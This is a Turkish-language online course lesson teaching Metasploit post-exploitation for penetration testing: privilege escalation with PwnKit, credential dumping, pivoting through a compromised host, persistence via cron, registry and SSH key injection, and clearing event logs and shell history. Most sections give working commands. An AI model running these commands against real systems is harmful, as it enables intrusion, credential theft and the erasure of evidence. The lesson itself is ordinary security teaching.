İstismar Sonrası: Pivot ve Kalıcılık
Yetki yükseltme, kimlik bilgisi dökümü ve kalıcılık için Metasploit'in istismar sonrası modüllerini kullanın.
İstismar Sonrası: Pivot ve Kalıcılık, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 4. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.
İstismar Sonrası Hedefler
İlk erişimden sonra saldırganın hedefleri şunlardır: ayrıcalıkları yükseltmek, istihbarat toplamak, kalıcı erişimi sürdürmek ve asıl hedefe (verilere, sistemlere veya etki alanı denetimine) ulaşmak için yanal hareket etmek.
Durumsal Farkındalık
Kabuk alındıktan sonraki ilk adımlar: nerede olduğunuzu anlayın. Sistem bilgilerini, ağ yapılandırmasını, mevcut kullanıcı ayrıcalıklarını, çalışan süreçleri ve ortam değişkenlerini toplayın.
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/linux/gather/enum_systemAyrıcalık Yükseltme
Yerel ayrıcalık yükseltme, düşük ayrıcalıklı bir kabuktan root/SYSTEM düzeyine geçiş sağlar. Metasploit'in local_exploit_suggester bileşeni, hedef OS sürümüne göre uygulanabilir çekirdek ve yerel istismarları belirler.
meterpreter > run post/multi/recon/local_exploit_suggester
# Identifies applicable exploits
# Then:
msf6 > use exploit/linux/local/cve_2021_4034_pwnkit
msf6 > set SESSION 1
msf6 > runKimlik Bilgilerini Toplama
Kimlik bilgilerini toplayın: özetlenmiş parolalar, yapılandırma dosyalarındaki düz metin kimlik bilgileri, tarayıcıya kaydedilmiş parolalar ve SSH anahtarları. Bunlar yanal hareketi ve kalıcılığı mümkün kılar.
meterpreter > run post/linux/gather/hashdump
meterpreter > run post/windows/gather/credentials/credential_collector
meterpreter > run post/multi/gather/ssh_creds
# Check env vars for cleartext creds:
meterpreter > run post/multi/gather/envAra Sistem Üzerinden Geçiş: Bağlantı Noktası Yönlendirme
Ara sistem üzerinden geçiş, güvenliği ihlal edilmiş bir ana bilgisayarı yalıtılmış iç ağlara ulaşmak için köprü olarak kullanır. Metasploit'in portfwd komutu, Meterpreter oturumu üzerinden yerel bağlantı noktası yönlendirmeleri oluşturur.
# Forward local port 3306 to internal DB
meterpreter > portfwd add -l 3306 -p 3306 -r 10.10.10.20
# Now connect locally:
mysql -h 127.0.0.1 -P 3306 -u rootOturumlar Üzerinden Yönlendirme
Metasploit'in route modülü, bir oturum üzerinden ağ yolları ekleyerek diğer modüllerin yalnızca ara sistem ana bilgisayarı üzerinden erişilebilen ağlara ulaşmasını sağlar.
msf6 > route add 10.10.10.0/24 1 # route via session 1
msf6 > route print
# Now run modules targeting 10.10.10.x
# through session 1 as pivotSOCKS Vekil Sunucusu ile Ara Sistem Üzerinden Geçiş
Metasploit üzerinden SOCKS vekil sunucusu (veya chisel/ssh -D), proxychains kullanarak rastgele araçları ara sistem üzerinden yönlendirmenizi sağlar; böylece nmap, curl ve tarayıcılar iç ağlara ulaşabilir.
# Set up SOCKS proxy through session
msf6 > use auxiliary/server/socks_proxy
msf6 > set SRVPORT 1080
msf6 > set VERSION 5
msf6 > run -j
# Route tools through proxy
proxychains nmap -sT 10.10.10.0/24Kalıcılık Mekanizmaları
Kalıcılık, erişimin yeniden başlatmalardan ve oturum kaybından sonra da sürmesini sağlar. Yaygın yöntemler: cron görevleri (Linux), kayıt defteri çalıştırma anahtarları (Windows), SSH authorized_keys ekleme ve hizmet kurulumu.
# Linux: cron-based persistence
meterpreter > run post/linux/manage/cron_persistence
# Windows: registry
meterpreter > run post/windows/manage/persistence_exe
# SSH key injection
echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keysİzleri Örtme
Saldırganlar gizliliği sürdürmek için günlükleri temizler. Güvenlik notu: modern SIEM ve EDR çözümleri günlükleri gerçek zamanlı olarak ana bilgisayar dışına gönderir; yerel günlükleri temizlemek merkezi kayıtları silmez.
meterpreter > clearev # clear Windows event logs
# Linux: clear bash history
unset HISTFILE
cat /dev/null > ~/.bash_historyİstismar Sonrası Modüller
Metasploit, Windows ve Linux için yüzlerce istismar sonrası modül içerir: kimlik bilgilerini toplama, tarayıcı verileri, tuş kaydı, ekran görüntüsü alma ve ağ numaralandırması.
msf6 > use post/windows/gather/enum_logged_on_users
msf6 > use post/multi/gather/browser_history
msf6 > use post/windows/gather/screen_spy
msf6 > set SESSION 1
msf6 > runNe Zaman Duracağınızı Bilme
Yetkili sızma sınamalarında, üzerinde anlaşılmış kapsam hedefine ulaştığınızda veya erişme yetkiniz olmayan verilerle karşılaştığınızda durun. İzlediğiniz yolu dikkatle belgeleyin; raporladığınız saldırı zinciri budur.
Hızlı Kontrol
Metasploit'in "route add" komutu neyi mümkün kılar?
Özet: İstismar Sonrası
İstismar sonrası aşama, gerçek etki oluşturmak için ilk erişimin üzerine inşa edilir: ayrıcalık yükseltme, kimlik bilgilerini toplama, yanal hareket ve kalıcılık. Metasploit her aşama için istismar sonrası modüller sağlar. Her adımı belgeleyin; girişten hedefe kadar olan saldırı zinciri, sızma sınamasının temel çıktısıdır.
Sıkça Sorulan Sorular
“İstismar Sonrası: Pivot ve Kalıcılık” dersi ücretsiz mi?
Evet — “İstismar Sonrası: Pivot ve Kalıcılık” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.
“İstismar Sonrası: Pivot ve Kalıcılık” dersinde ne öğreneceğim?
Yetki yükseltme, kimlik bilgisi dökümü ve kalıcılık için Metasploit'in istismar sonrası modüllerini kullanın. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.
Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?
Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 4. dersidir.
“İstismar Sonrası: Pivot ve Kalıcılık” dersi ne kadar sürer?
Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.
Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?
Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.
Bu kursun tüm dersleri
- Metasploit Mimarisi ve msfconsole
- Bilinen Bir Güvenlik Açığını İstismar Etme
- Yükler: Aşamalı ve Aşamasız, Meterpreter
- İstismar Sonrası: Pivot ve Kalıcılık